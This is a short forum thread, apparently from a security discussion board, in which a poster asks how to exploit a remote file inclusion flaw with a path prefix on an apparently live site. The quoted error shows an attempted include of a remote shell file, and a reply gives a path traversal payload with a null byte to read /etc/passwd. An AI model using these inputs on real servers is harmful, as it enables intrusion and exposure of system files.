If you have some interesting news or want to throw up a link to discuss it, here's the place. Anything is okay, even shameless vendor launches (since that is often applicable to what we work on).
I recently found a RFI but I am a bit sketchy on how to go about--hopefully someone knowledgeable will be able to aid me:
Warning: fopen(XXXX/../../http://www.url.com/~user/shell.txt) [function.fopen]: failed to open stream: No such file or directory in /home/amdo/public_html/****/***.php on line 222
It appears something is prefixed, what's a method to successfully RFI?
I am just trying to et a better understanding of how to do it with some things in the way such as prefixes.
I don't think you can really include a remote file in this case but at least you can do path traversal - ../../../../../../etc/passwd%00 should work (unless PHP is properly configured of course).
